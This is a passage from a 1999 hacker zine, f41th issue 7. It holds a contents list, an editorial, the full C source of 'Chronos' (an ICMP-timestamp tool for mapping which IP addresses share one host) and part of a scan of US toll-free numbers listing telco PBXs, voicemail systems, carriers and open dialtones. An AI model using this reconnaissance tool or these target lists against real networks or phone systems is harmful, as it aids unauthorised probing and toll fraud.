home *** CD-ROM | disk | FTP | other *** search
/ Cuteskunk BBS / cuteskunk.zip / cuteskunk / unsorted-zines / faith7.txt < prev    next >
Text File  |  2003-06-29  |  193KB  |  5,133 lines

  1.                        [ http://darkcyde.system7.org ]
  2.                        [   http://hybrid.dtmf.org    ]
  3.  
  4.            yyyyyssssyyyy yyyyssssyyyy      yyyy         yyyy
  5.            |lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy  
  6.            :|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$  
  7.            :||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$  
  8.            :::|l  ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS  
  9.            ::::|  $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l  
  10.            .:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::|   
  11.  
  12.           [  f41th issue 7 - July 1999                              ]
  13.           [  f41th magazine is a production of D4RKCYDE             ]
  14.           [  submissions: hybrid@dtmf.org downtime@webcrunchers.com ]
  15.           [  mailto: hybrid@dtmf.org downtime@webcrunchers.com      ]
  16.           [  #darkcyde efnet                                        ]
  17.  
  18.  
  19.                                   PURE FE4R
  20.  
  21.  
  22. OOO-(z}-|[  F41th 7 Editorial                   ]--(  hybrid     )--{z)-|[OOO
  23. OOO-(Z}-|[  Chronus ICMP Packet Timestamps      ]--(  rwxrwxrwx  )--{Z)-|[OOO    
  24. OOO-(z}-|[  US 18OO Random Scan                 ]--(  force      )--{z)-|[OOO
  25. OOO-(Z}-|[  Local? Linux DoS using nmap         ]--(  gov-boi    )--{Z)-|[OOO
  26. OOO-(z}-|[  Impementing Backdoors               ]--(  msinister  )--{z)-|[OOO
  27. OOO-(Z}-|[  UK Carrier Scan of O8OO917[XXXX]    ]--(  faith      )--{Z)-|[OOO
  28. OOO-(z}-|[  Qpop Trojan Installer               ]--(  gov-boi    )--{z)-|[OOO
  29. OOO-(Z}-|[  Rolling Deep                        ]--(  tgb        )--{Z)-|[OOO
  30. OOO-(z}-|[  5ESS Compact Digital Exchanges      ]--(  hybrid     )--{z)-|[OOO
  31. OOO-(Z}-|[  UK Scan of Exchange O8OO672[XXX]    ]--(  faith      )--{Z)-|[OOO
  32. OOO-(z}-|[  SUIDcyde Bugtraq Review             ]--(  bodie      )--{z)-|[OOO
  33. OOO-(Z}-|[  DoD Communication networks DMS      ]--(  hybrid     )--{Z)-|[OOO
  34. OOO-(z}-|[  ICQ Conspiracy                      ]--(  camel      )--{z)-|[OOO
  35. OOO-(Z}-|[  Pearl Programming                   ]--(  zomba      )--{Z)-|[OOO
  36. OOO-(z}-|[  Packet Radio                        ]--(  jasun      )--{z)-|[OOO
  37.  
  38.  -----------------------------------------------------------------------
  39.  D4RKCYDE 
  40.  
  41.  [hybrid] [downtime] [zomba] [force]    *  #darkcyde EfNet (no lamerz)
  42.  [shadowx] [elf] [msinister] [shylock]  *  http://darkcyde.system7.org
  43.  [lowtek] [digiphreq] [bodie] [sintax]  *  hybrid@dtmf.org
  44.  [nino] [microwire]                     *  downtime@webrunchers.com
  45.  
  46.  SHOUTZ
  47.  
  48.  [b4b0] [9x] [ch1ckie] [extriad] [kraise] [sonicborg] [jasun] [aktiver]
  49.  [knight] [siezer] [oeb] [skyper] [typeo] [tgb] [camel] [gov-boi] [rwx]
  50.  [monty] [phace] [psyclone] [vixen] [port] [mranon] [w1rep41r] [oclet]
  51.  [l0r1] [ginger] [tip] [milkman] [ph1x] [gr1p] [prez] [network] [lewp]
  52.  [xio] [backa] [loco] [thewombat] [jd] [spacity] [bind] [lusta] [subzz]
  53.  [skalar] [voltage] [simmeth] [kryptus] [pbxphreak] [gb] [smiler] [jorge]
  54.  -----------------------------------------------------------------------
  55.  
  56. <Fatality> [hybrid-] the king of idle has arrived.
  57. *[JaSuN]* Beer, Sand, Rollercoasters, Computers and Communications."
  58. <bodie> hybrids dog pissed on me 
  59. <bodie> i'll kill that shitty thing
  60. <hybrid-> someone give me a quote i cant put at the top of f41th 7
  61. <shadow_x> "there can be only one"
  62. <[JaSuN]> blasted from the past, out into the future
  63. <[JaSuN]> heh
  64. <[JaSuN]> "Whats the Infoz?
  65. <[JaSuN]> "Gimme the Infoz?
  66. <Kryptus> elvis has left the building
  67. *** ani_slut has quit IRC (Read error: 0 (Error 0))
  68.  
  69.  
  70.      "30 million nerds communicating with people they don't know, about
  71.      things they don't understand, for reasons they can't explain."
  72.      
  73.      -- Guy Kawasaki, Apple Computer
  74.      
  75.      "I have yet to see any pornography on the Internet....mainly
  76.      because I'm not looking for it. If you're finding for it, you're
  77.      looking for it. Either quit looking for it or quit complaining
  78.      about your sucess."
  79.      
  80.      -- Don Shorock
  81.      
  82.      Usenet is like a herd of performing elephants with diarrhea --
  83.      massive, difficult to redirect, awe-inspiring, entertaining, and a
  84.      source of mind-boggling amounts of excrement when you least expect
  85.      it.
  86.      
  87.      -- Author unknown
  88.  
  89.  
  90. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  91. -->]OO[:[ Editorial ]::::::::::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]::::
  92. -->[OO]:::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]:::::::::::::
  93.  
  94. Welcome to f41th 7. I can't believe that we have managed to get 3 issues of
  95. f41th out in 1 month, getting a zine together is not easy work, it takes alot
  96. of time to write the idividual articles in the issue, I'd like to say thanks
  97. to everyone that has contributed to this issue and previous issues of f41th..
  98. It's getting better all the time, keep the articles rolling in :) On another
  99. note, we have noticed a higher level of .gov and .mil hits on the darkcyde
  100. f41th distro sites. For example..
  101.  
  102. shepherd.hurlburt.af.mil - - [07/Jun/1999:16:49:39 -0500] "GET faith6.txt
  103. gw.assist.mil            - - [08/Jun/1999:11:33:31 -0500] "GET faith6.txt
  104. coni-68.conicit.gov.ve   - - [07/Jun/1999:10:26:58 -0500] "GET faith6.txt
  105. gsnmail.gov.tw           - - [07/Jun/1999:13:57:46 -0500] "GET faith6.txt
  106. irmbb66.nigms.nih.gov    - - [07/Jun/1999:16:54:49 -0500] "GET faith6.zip
  107. operations.dera.gov.uk   - - [12/Jun/1999:00:06:28 -0500] "GET faith6.txt
  108.  
  109. dera.gov.uk strikes fjear, goto www.dera.gov.uk to take a look. We've also
  110. had hits from various telcos such as Cable&Wireless, and US RBOCs such as
  111. USWest and other BELL*.*'s. According to alot of people I have spoken to,
  112. dera.gov.uk regualy visit hp sites, and probably database them all.. However,
  113. if they wanna read f41th it's upto them, we're not complaining. Sinse the
  114. last issue I've noticed alot of servers are mirroring the f41th archives, I'd
  115. like to ask if you want to mirror our zine please email me or another
  116. darkcyde member so we can list you in the f41th mirrors list. If you want to
  117. submit anything to f41th, please email us or me, or comto #darkcyde EFNET,
  118. /dcc send hybrid 0d4yz.txt .. peace, enjoy the issue, take it easy. hybrid.
  119.  
  120. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  121. -->]OO[:[ Chronos ]:::::::[OO--[ by rxwrwxrwx ]---[ rwxrwxrwx@soldier.net ]::
  122. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  123.  
  124. Chronos
  125. -------
  126.  
  127. Chronos is a tool that can be used to measure the degree of synchronization
  128. between hosts. It uses ICMP Timestamp packets to ask those hosts for their
  129. actual times (with microsecond precision).
  130.  
  131. Some real-world applications for Chronos include checking whether your NTP-
  132. enabled machines are working as expected or not. Also time differences
  133. between certain hosts can be dangerous from a security point of view:
  134. `slight' delays (in the range or minutes or even less depending on the load
  135. of the network/servers) can make it a real pain when tracking things down in
  136. logs from those hosts. Another (maybe more useful) way of using chronos is to
  137. aid in remotely determining certain characteristics of network topologies
  138. like knowing if several different IP addresses correspond to the same
  139. physical machine.
  140.  
  141. for example:
  142.  
  143. Non-authoritative answer:
  144. Name:    random.isp.net
  145. Address:  207.201.167.77
  146.  
  147. Non-authoritative answer:
  148. Name:    some.ip.alias.of.random.isp.net
  149. Address:  209.170.47.7
  150.  
  151. # ./chronos -l 192.168.1.13 -s 0 -u 500000 207.201.167.77 209.170.47.7
  152. Chronos - measures synchronization between hosts
  153. (c) 1999 by 777 <rwxrwxrwx@soldier.net>
  154. Fasten your seat belts, this is gonna hurt!!
  155.  
  156. host == 207.201.167.77    id ==     0, seq == 30526, icmp_ttime ==  36715519
  157. host == 209.170.47.7      id ==     0, seq == 10405, icmp_ttime ==  36715522
  158. host == 207.201.167.77    id ==     1, seq == 25611, icmp_ttime ==  36715852
  159. host == 209.170.47.7      id ==     1, seq == 58905, icmp_ttime ==  36715970
  160. host == 207.201.167.77    id ==     2, seq == 33126, icmp_ttime ==  36716350
  161. host == 209.170.47.7      id ==     2, seq ==  1421, icmp_ttime ==  36716460
  162. host == 207.201.167.77    id ==     3, seq == 46280, icmp_ttime ==  36716851
  163. host == 209.170.47.7      id ==     3, seq == 44840, icmp_ttime ==  36716854
  164. host == 207.201.167.77    id ==     4, seq == 60411, icmp_ttime ==  36717350
  165. host == 209.170.47.7      id ==     4, seq == 63000, icmp_ttime ==  36717460
  166. host == 207.201.167.77    id ==     5, seq == 60383, icmp_ttime ==  36717850
  167. host == 209.170.47.7      id ==     5, seq == 12962, icmp_ttime ==  36717853
  168.  
  169. --- statistics ---
  170.  
  171. These are synchronized. We assume the IP addresses do, in fact, correspond to
  172. the same physical machine (which is true for this example) thus allowing us
  173. to narrow things down to the key servers of a network.
  174.  
  175. another example:
  176.  
  177. Name:       example.com
  178. Addresses:  197.77.140.5, 197.77.140.6
  179. Aliases:    www.example.com
  180.  
  181. # ./chronos -l 192.168.1.13 -s 0 -u 500000 195.77.240.5 195.77.240.6
  182. Chronos - measures synchronization between hosts
  183. (c) 1999 by 777 <rwxrwxrwx@soldier.net>
  184. Fasten your seat belts, this is gonna hurt!!
  185.  
  186. host == 197.77.140.5      id ==     0, seq ==  5450, icmp_ttime ==  44024897
  187. host == 197.77.140.6      id ==     0, seq == 55100, icmp_ttime ==  36591075
  188. host == 197.77.140.5      id ==     1, seq == 24786, icmp_ttime ==  44025375
  189. host == 197.77.140.6      id ==     1, seq == 35820, icmp_ttime ==  36591565
  190.  
  191. --- statistics ---
  192.  
  193. As you can see these are obviously not in-sync.
  194.  
  195. The code presented here is just a proof of concept and lacks some key
  196. routines (like automagickally analysing the results), but it demonstrates the
  197. technique.
  198.  
  199. Chronos/Makefile100644      0      0         732  6732275270  12204 0ustar  rootroot# Makefile
  200.  
  201. CC = gcc
  202. CFLAGS = -D_REENTRANT -Wall -O3 -funroll-loops -finline-functions
  203. LIBS = -lpthread
  204. OBJS = main.o tstamp.o engine.o stats.o
  205.  
  206. all: chronos
  207.  
  208. chronos: $(OBJS)
  209.     $(CC) $(CFLAGS) -o chronos $(OBJS) $(LIBS)
  210.  
  211. main.o: main.c engine.h
  212.     $(CC) $(CFLAGS) -c main.c
  213.  
  214. tstamp.o: tstamp.c tstamp.h
  215.     $(CC) $(CFLAGS) -c tstamp.c
  216.  
  217. engine.o: engine.c engine.h
  218.     $(CC) $(CFLAGS) -c engine.c
  219.  
  220. stats.o: stats.c stats.h
  221.     $(CC) $(CFLAGS) -c stats.c
  222.  
  223. clean:
  224.     rm -f core chronos *.o
  225. Chronos/engine.c100644      0      0        4703  6732274545  12203 0ustar  rootroot/*
  226.     [   e n g i n e . c   ]
  227.  
  228.     Handles the setting up of timers and scheduling of threads
  229.     Version: $Id: engine.c,v 1.7 1999/04/28 15:04:18 coder Exp coder $
  230.     (c) 1999 by 777 <rwxrwxrwx@soldier.net>
  231. */
  232.  
  233. #include <stdio.h>
  234. #include <stdlib.h>
  235. #include <string.h>
  236. #include <pthread.h>
  237. #include <signal.h>
  238. #include <unistd.h>
  239. #include <limits.h>
  240. #include <sys/types.h>
  241. #include <sys/time.h>
  242. #include "engine.h"
  243. #include "tstamp.h"
  244.  
  245. int iters = -1;        /* number of times we've queried all the hosts */ 
  246.  
  247. static void spawn_threads(int signum);
  248. static void launch_it(void *arg);
  249.  
  250. int
  251. init_timer_interrupt(void)
  252. {
  253.     struct sigaction act;
  254.  
  255.     memset(&act, 0, sizeof(act));
  256.     act.sa_handler = spawn_threads;
  257.     act.sa_flags = SA_RESTART;
  258.  
  259.     if (sigaction(SIGALRM, &act, NULL) == -1)
  260.         return -1;
  261.     else
  262.         return 0;
  263. }
  264.  
  265. int
  266. setup_timer(time_t secs, time_t usecs)
  267. {
  268.     struct itimerval timer;
  269.  
  270.     timer.it_interval.tv_sec = secs;
  271.     timer.it_interval.tv_usec = usecs;
  272.     timer.it_value = timer.it_interval;
  273.  
  274.     if (setitimer(ITIMER_REAL, &timer, NULL) == -1)
  275.         return -1;
  276.     else
  277.         return 0;
  278. }
  279.  
  280. static void
  281. spawn_threads(int signum)
  282. {
  283.     u_int i;
  284.     int retval;
  285.     pthread_t worker_tid[nthreads];
  286.     pthread_attr_t worker_attr;
  287.  
  288.     printf("\n");
  289.     ++iters;
  290.     
  291.     /* We set our threads' scheduling policy so that they run in realtime 
  292.        and make them detached by default since we don't need their return values */
  293.     if (pthread_attr_init(&worker_attr) != 0) {
  294.         fprintf(stderr, "pthread_attr_init failed\n");
  295.         exit(-1);
  296.     }
  297.     if (pthread_attr_setdetachstate(&worker_attr, PTHREAD_CREATE_DETACHED) != 0) {
  298.         fprintf(stderr, "pthread_attr_setdetachstate failed\n");
  299.         exit(-1);
  300.     }
  301.     if (pthread_attr_setschedpolicy(&worker_attr, SCHED_RR) != 0) {
  302.         fprintf(stderr, "pthread_attr_setschedpolicy failed\n");
  303.         exit(-1);
  304.     }
  305.     
  306.     for (i = 0; i < nthreads; i++) {
  307.         if ((retval = pthread_create(&worker_tid[i], &worker_attr, (void *) &launch_it, (void *) i)) != 0) {
  308.             fprintf(stderr, "pthread_create failed\n");
  309.             if (retval == EAGAIN)
  310.                 continue;
  311.             exit(-1);
  312.         }
  313.     }
  314.  
  315.     if (pthread_attr_destroy(&worker_attr) != 0) {
  316.         fprintf(stderr, "pthread_attr_destroy failed\n");
  317.         exit(-1);
  318.     }
  319. }
  320.  
  321. void
  322. launch_it(void *arg)
  323. {
  324.     u_short seqnum;
  325.     struct timeval tv; 
  326.  
  327.     gettimeofday(&tv, NULL);
  328.     srand(tv.tv_usec);
  329.     seqnum = (rand() % USHRT_MAX);
  330.  
  331.     if (timestamp(dest[(u_int) arg], iters, seqnum) == 0)
  332.         fprintf(stderr, "   host == %-15s\tid == %5u, seq == %5u, icmp_ttime == %9s\n",
  333.             dest[(u_int) arg], (u_short) iters, seqnum, "*failed*");
  334.  
  335.     pthread_exit(NULL);
  336. }
  337. Chronos/engine.h100644      0      0        1022  6732274571  12176 0ustar  rootroot#ifndef _ENGINE_H
  338. #define _ENGINE_H
  339. /*
  340.     [   e n g i n e . h   ]
  341.  
  342.     Handles scheduling of threads and timers
  343.     Version: $Id: engine.h,v 1.4 1999/04/28 15:04:22 coder Exp coder $
  344.     (c) 1999 by 777 <rwxrwxrwx@soldier.net>
  345. */
  346.  
  347. #include <netinet/in.h>
  348. #include <sys/types.h>
  349. #include <sys/time.h>
  350.  
  351. u_int nthreads;            /* number of concurrent working threads */
  352. u_char **dest;            /* array with addesses of destination hosts */
  353.  
  354. extern int init_timer_interrupt(void);
  355. extern int setup_timer(time_t secs, time_t usecs);
  356.  
  357. #endif /* _ENGINE_H */
  358. Chronos/in_cksum.c100644      0      0        1107  6711625424  12532 0ustar  rootroot/*
  359.     [   i n _ c k s u m . c   ]
  360.  
  361.     Version: $Id: in_cksum.c,v 1.1 1999/04/23 17:13:43 coder Exp $
  362. */
  363.  
  364. #include <sys/types.h>
  365.  
  366. int
  367. in_cksum(u_short *p, int n)
  368. {
  369.     register u_short answer;
  370.     register long sum = 0;
  371.     u_short odd_byte = 0;
  372.  
  373.     while (n > 1) {
  374.         sum += *p++; 
  375.         n -= 2;
  376.     }
  377.     
  378.     /* mop up an odd byte, if necessary */
  379.     
  380.     if (n == 1) {
  381.         *(u_char *) (&odd_byte) = *(u_char *) p;
  382.         sum += odd_byte;
  383.     }
  384.     
  385.     sum = (sum >> 16) + (sum & 0xffff);    /* add hi 16 to low 16 */
  386.     sum += (sum >> 16);            /* add carry */
  387.     answer = (int)~sum;            /* ones-complement, truncate*/
  388.     
  389.     return (answer);
  390. }
  391. Chronos/in_cksum.h100644      0      0         346  6711625170  12521 0ustar  rootroot#ifndef _IN_CKSUM_H
  392. #define _IN_CKSUM_H
  393. /*
  394.     [   i n _ c k s u m . h   ]
  395.  
  396.     Version: $Id: in_cksum.h,v 1.3 1999/04/23 13:52:35 coder Exp $
  397. */
  398.  
  399. #include "in_cksum.c"
  400.  
  401. extern int in_cksum(u_short *p, int n);
  402.  
  403. #endif /* _IN_CKSUM_H */
  404. Chronos/main.c100644      0      0        4475  6732275243  11664 0ustar  rootroot/*
  405.     [   m a i n . c   ]
  406.     
  407.     Glues it all together.
  408.     Version: $Id: main.c,v 1.1 1999/04/24 16:55:55 coder Exp coder $
  409.     (c) 1999 by 777 <rwxrwxrwx@soldier.net>
  410.  
  411.     usage: # ./chronos -l 192.168.1.111 -s 0 -u 500000 `nmap -sP -PI network/24 \
  412.          | grep "Host" | cut -f 2 -d '(' | grep "appears to be up" | cut -f 1 -d ')'`
  413. */
  414.  
  415. #include <stdio.h>
  416. #include <stdlib.h>
  417. #include <string.h>
  418. #include <unistd.h>
  419. #include <sys/socket.h>
  420. #include <sys/types.h>
  421. #include <arpa/inet.h>
  422. #include "engine.h"
  423. #include "stats.h"
  424. #include "main.h"
  425.  
  426. extern u_int nthreads;
  427. extern u_char **dest;
  428.  
  429. static void usage(char *name);
  430. static void banner(void);
  431.  
  432. int
  433. main(int argc, char *argv[])
  434. {
  435.     int i, c;
  436.     u_char *local_ip = NULL;
  437.     time_t secs = 1, usecs = 0;    /* default interval set to 1 second */
  438.  
  439.     if (geteuid() != 0)
  440.         fprintf(stderr, "Sorry, you don't have permissions to run this program\n"), exit(-1);
  441.     if (argc < 2)
  442.         usage(argv[0]), exit(-1);
  443.  
  444.     while((c = getopt(argc, argv, "l:s:u:")) != -1) {
  445.         switch (c) {
  446.         case 'l':    /* local ip address */
  447.             local_ip = strdup(optarg);
  448.             break;
  449.         case 's':    /* seconds */
  450.             secs = strtoul(optarg, NULL, 10);
  451.             break;
  452.         case 'u':    /* microseconds */
  453.             usecs = strtoul(optarg, NULL, 10);
  454.             break;
  455.         }
  456.     }
  457.  
  458.     if (inet_aton(local_ip, &local_addr) == -1)
  459.         perror("inet_aton"), usage(argv[0]), exit(-1);
  460.     free(local_ip);
  461.  
  462.     nthreads = argc - optind;
  463.     
  464.     /* copy each ip address passed as command line parameter into an array (which we firstly allocate) */
  465.     if ((dest = (u_char **) calloc(nthreads, sizeof(u_char *))) == NULL)
  466.         perror("calloc"), exit(-1);
  467.     for (i = 0; i < nthreads; i++)
  468.         dest[i] = strdup(argv[optind + i]);
  469.  
  470.     banner();
  471.     
  472.     if (init_break_interrupt() == -1)
  473.         fprintf(stderr, "Couldn't setup SIGINT handler\n"), exit(-1);
  474.     if (init_timer_interrupt() == -1)
  475.         fprintf(stderr, "Couldn't setup SIGALRM handler\n"), exit(-1);
  476.  
  477.     printf("Fasten your seat belts, this is gonna hurt!!\n");
  478.  
  479.     if (setup_timer(secs, usecs) == -1)
  480.         fprintf(stderr, "Couldn't setup timer\n"), exit(-1);
  481.  
  482.     for ( ; ; );
  483.  
  484.     free(dest);
  485.     exit(0);
  486. }
  487.  
  488. void
  489. usage(char *name)
  490. {
  491.     banner();
  492.     fprintf(stderr, "usage: %s -l <local ip address> [-s <secs>] [-u <usecs>] <destination 1> [destination 2] [destination 3] ...\n", name);
  493. }
  494.  
  495. void
  496. banner(void)
  497. {
  498.     printf("Chronos - measures synchronization between hosts\n");
  499.     printf("(c) 1999 by 777 <rwxrwxrwx@soldier.net>\n");
  500. }
  501. Chronos/main.h100644      0      0         517  6711705462  11640 0ustar  rootroot#ifndef _MAIN_H
  502. #define _MAIN_H
  503. /*
  504.     [   m a i n . c   ]
  505.     
  506.     Glues it all together.
  507.     Version: $Id: main.c,v 1.1 1999/04/24 16:55:55 coder Exp coder $
  508.     1999 by 777 <rwxrwxrwx@soldier.net>
  509. */
  510.  
  511. #include <sys/types.h>
  512. #include <netinet/in.h>
  513.  
  514. #define ARGSIZE        (strlen(argv[optind + i]) + 1)
  515.  
  516. struct in_addr local_addr;
  517.  
  518. #endif /* _MAIN_H */
  519. Chronos/stats.c100644      0      0        1360  6732275154  12065 0ustar  rootroot/*
  520.     [   s t a t s . c   ]
  521.  
  522.     Deals with the analysis and display of the results
  523.     Version: $Id: stats.c,v 1.1 1999/04/28 15:04:37 coder Exp coder $
  524.     (c) 1999 by 777 <rwxrwxrwx@soldier.net>
  525. */
  526.  
  527. #include <stdio.h>
  528. #include <stdlib.h>
  529. #include <string.h>
  530. #include <signal.h>
  531. #include "engine.h"
  532. #include "main.h"
  533.  
  534. static void analyse(int signum);
  535. static void show_results(void);
  536.  
  537. int
  538. init_break_interrupt(void)
  539. {
  540.     struct sigaction act;
  541.  
  542.     memset(&act, 0, sizeof(act));
  543.     act.sa_handler = analyse;
  544.     act.sa_flags = SA_ONESHOT | SA_NOMASK;
  545.  
  546.     if (sigaction(SIGINT, &act, NULL) == -1)
  547.         return -1;
  548.     else
  549.         return 0;
  550. }
  551.  
  552. static void
  553. analyse(int signum)
  554. {
  555.     show_results();
  556.     exit(EXIT_SUCCESS);
  557. }
  558.  
  559. static void
  560. show_results(void)
  561. {
  562.     printf("\n--- statistics ---\n");
  563. }
  564. Chronos/stats.h100644      0      0         437  6732275171  12055 0ustar  rootroot#ifndef _STATS_H
  565. #define _STATS_H
  566. /*
  567.     [   s t a t s . c   ]
  568.  
  569.     Deals with the analysis and display of the results
  570.     Version: $Id: stats.h,v 1.1 1999/04/28 15:04:41 coder Exp coder $
  571.     (c) 1999 by 777 <rwxrwxrwx@soldier.net>
  572. */
  573.  
  574. extern int init_break_interrupt(void);
  575.  
  576. #endif /* _STATS_H */
  577. Chronos/tstamp.c100644      0      0        6205  6732274437  12245 0ustar  rootroot/*
  578.     [   t s t a m p . c   ]
  579.  
  580.     Sends an ICMP Timestamp request and reads the reply
  581.     Version: $Id: tstamp.c,v 1.10 1999/04/28 15:04:44 coder Exp coder $
  582.     (c) 1999 by 777 <rwxrwxrwx@soldier.net>
  583. */
  584.  
  585. #include <stdio.h>
  586. #include <string.h>
  587. #include <stdlib.h>
  588. #include <time.h>
  589. #include <errno.h>
  590. #include <unistd.h>
  591. #include <sys/types.h>
  592. #include <sys/socket.h>
  593. #include <sys/time.h>
  594. #include <netinet/in.h>
  595. #include <netinet/ip.h>
  596. #include <netinet/ip_icmp.h>
  597. #include <arpa/inet.h>
  598. #include <linux/in_systm.h>
  599. #include "in_cksum.h"
  600. #include "tstamp.h"
  601. #include "main.h"
  602.  
  603. #define IPHDRSIZE    sizeof(struct iphdr)
  604.  
  605. extern struct in_addr local_addr;    /* we get this from main.h */
  606.  
  607. /* sends dst an icmp timestamp request and returns the reply or 0 if it failed */
  608. u_int32_t
  609. timestamp(char *dst, u_short id, u_short seq)
  610. {
  611.     int sockfd;
  612.     struct sockaddr_in src_sa, dst_sa;
  613.     struct icmp *icmp;
  614.     struct in_addr dst_addr;
  615.     char buf[IPHDRSIZE + ICMP_TSLEN];    /* this is the maximum size we'll ever need */
  616.     int buflen;
  617.     
  618.     /* We open a raw ICMP socket, after that we bind() it to the source address 
  619.        and connect() it to the destination address. Thus we enforce that the kernel
  620.        passes to the socket only ICMP packets which match the relevant addresses.
  621.        It also explains why we use send() and recv() instead of sendto() and recvfrom()
  622.        (we're dealing with connected sockets) */
  623.     if ((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1)
  624.         return 0;
  625.  
  626.     if (!(inet_aton(dst, &dst_addr))) {
  627.         close(sockfd);
  628.         return 0;
  629.     }
  630.     
  631.     memset(&src_sa, 0, sizeof(struct sockaddr_in));
  632.     memset(&dst_sa, 0, sizeof(struct sockaddr_in));
  633.     src_sa.sin_family = dst_sa.sin_family = AF_INET;
  634.     /* we have to explicitly bind our socket to a specific address instead of INADDR_ANY
  635.        in order to receive correctly icmps sent to aliases ips of ours */
  636.     src_sa.sin_addr = local_addr;
  637.     dst_sa.sin_addr = dst_addr;
  638.  
  639.     if (bind(sockfd, (struct sockaddr *) &src_sa, sizeof(struct sockaddr_in)) == -1) {
  640.         perror("bind");
  641.         close(sockfd);
  642.         return 0;
  643.     }
  644.     if (connect(sockfd, (struct sockaddr *) &dst_sa, sizeof(struct sockaddr_in)) == -1) {
  645.         perror("connect");
  646.         close(sockfd);
  647.         return 0;
  648.     }
  649.  
  650.     /* Next, ICMP Timestamp-request header is built and sent */
  651.     memset(buf, 0, sizeof(buf));
  652.  
  653.     icmp = (struct icmp *) buf;
  654.     icmp->icmp_type = ICMP_TSTAMP;
  655.     icmp->icmp_code = 0;
  656.     icmp->icmp_cksum = 0;
  657.     icmp->icmp_id = id & 0xffff;
  658.     icmp->icmp_seq = seq & 0xffff;
  659.     icmp->icmp_otime = (u_int32_t) time(NULL);
  660.     icmp->icmp_cksum = in_cksum((u_short *) icmp, ICMP_TSLEN);
  661.  
  662.     if (send(sockfd, buf, ICMP_TSLEN, 0) == -1) {
  663.         perror("send");
  664.         close(sockfd);
  665.         return 0;
  666.     }
  667.  
  668.     /* Now it's time to read the reply */
  669.     memset(buf, 0, sizeof(buf));
  670.     buflen = IPHDRSIZE + ICMP_TSLEN;
  671.     if (recv(sockfd, buf, buflen, 0) > 0) {
  672.         icmp = (struct icmp *) (buf + IPHDRSIZE);
  673.         if ((icmp->icmp_type == ICMP_TSTAMPREPLY) && (icmp->icmp_id == (id & 0xffff)) && (icmp->icmp_seq == (seq & 0xffff)))
  674.             printf("   host == %-15s\tid == %5u, seq == %5u, icmp_ttime == %9u\n", dst, id, seq, ntohl(icmp->icmp_ttime));
  675.         else {
  676.             close(sockfd);
  677.             return 0;
  678.         }
  679.     } else {
  680.         close(sockfd);
  681.         return 0;
  682.     }
  683.     
  684.     id++;
  685.     seq++;
  686.  
  687.     close(sockfd);
  688.     return (ntohl(icmp->icmp_ttime));
  689. }
  690. Chronos/tstamp.h100644      0      0         644  6732274477  12237 0ustar  rootroot#ifndef _TSTAMP_H
  691. #define _TSTAMP_H
  692. /*
  693.     [   t s t a m p . h   ]
  694.  
  695.     Sends an ICMP TimeStamp request and handles the reply
  696.     Version: $Id: tstamp.h,v 1.5 1999/04/27 14:16:04 coder Exp $
  697.     (c) 1999 by 777 <rwxrwxrwx@soldier.net>
  698. */
  699.  
  700. #include <sys/types.h>
  701.  
  702. /* sends dst an icmp timestamp request and returns the reply or 0 if it failed */
  703. extern u_int32_t timestamp(char *dst, u_short id, u_short seq);
  704.  
  705. #endif /* TSTAMP_H */
  706.  
  707.  
  708. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  709. -->]OO[:[ 18OO scan ]::::::::[OO--[ by force ]---[ force007@hotmail.com ]::::
  710. -->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  711.  
  712. 18oo scan by force
  713.  
  714. telco...
  715. --oOo---
  716.  
  717. 622-7380  pbx at&t system network control centre maintanence group
  718. 574-6369  mci worldcom paging system
  719. 654-3211  us watts enter authorisation code
  720. 982-7144  pbx some telco access system
  721. 472-1175  v south westen bell
  722. 982-7147  pbx north-tech of mci worldcom
  723. 829-0030  v mci
  724. 829-0026  fax/carrier
  725. 220-4818  v mci metro
  726. 786-9445  conference calling centre
  727. 475-4455  v conf centre passcode please
  728. [1-888] 622-6823  pbx at&t service and maintanence single point number
  729. [1-888] 333-0879  conf centre
  730.  
  731. carriers...
  732. --oOo------
  733.  
  734. 535-2648  carrier wouldn't connect
  735. 567-1745  carrier
  736. 232-1249  carrier
  737. 232-1968  carrier
  738. 232-1863  carrier
  739. 599-0262  carrier
  740. 599-0861  carrier? continuos carrier/fax tone
  741. 599-0477  carrier/fax
  742. 599-0298  carrier
  743. 321-2403  carrier
  744. 321-7468  carrier
  745. 321-1542  carrier
  746. 321-1173  carrier
  747. 321-8619  carrier
  748. 321-3756  carrier
  749. 321-2780  carrier? weird tone
  750. 321-5352  carrier
  751.  
  752. vmbs...
  753. --oOo--
  754.  
  755. 232-1279  vmb lots of options
  756. 232-1765  vmb
  757. 321-0103  vms mm k-mart resource centre
  758. 321-2566  pbx vms dell micro products
  759. 321-6909  vms mm
  760. 321-8691  pbx vms
  761. 466-9222  octel direct
  762. 331-1025  vms minneapolis police and fire
  763. 2O8-9996  
  764. 227-O8OO
  765. 231-1OOO
  766. 285-3222
  767. 285-6399
  768. 322-5889
  769. 345-6323
  770. 418-2292
  771. 423-585O
  772. 433-6245
  773. 455-115O
  774. 456-1188
  775. 466-53OO
  776. 466-9222
  777. 476-2O44
  778. 539-5488
  779. 577-9997
  780. 667-8424
  781. 685-391O
  782. 72O-9OO4
  783. 72O-9O22
  784. 726-2363
  785. 746-7766
  786. 777-1495
  787. 777-17O8
  788. 777-6266
  789. 777-9633
  790. 792-272O
  791. 829-OO17
  792. 858-3651
  793. 868-5995
  794. 887-OO11
  795. 966-9996
  796.  
  797. tones...
  798. --oOo---
  799.  
  800. 535-2682  dialtone
  801. 321-6228  dialtone [you have dialled an invalid account code]
  802. 535-2151  dialtone
  803. 232-1777  dialtone [dialled 1800 and it rings somewhere]
  804. 232-1282  dialtone [dialled 1800 and it rang a residential number?]
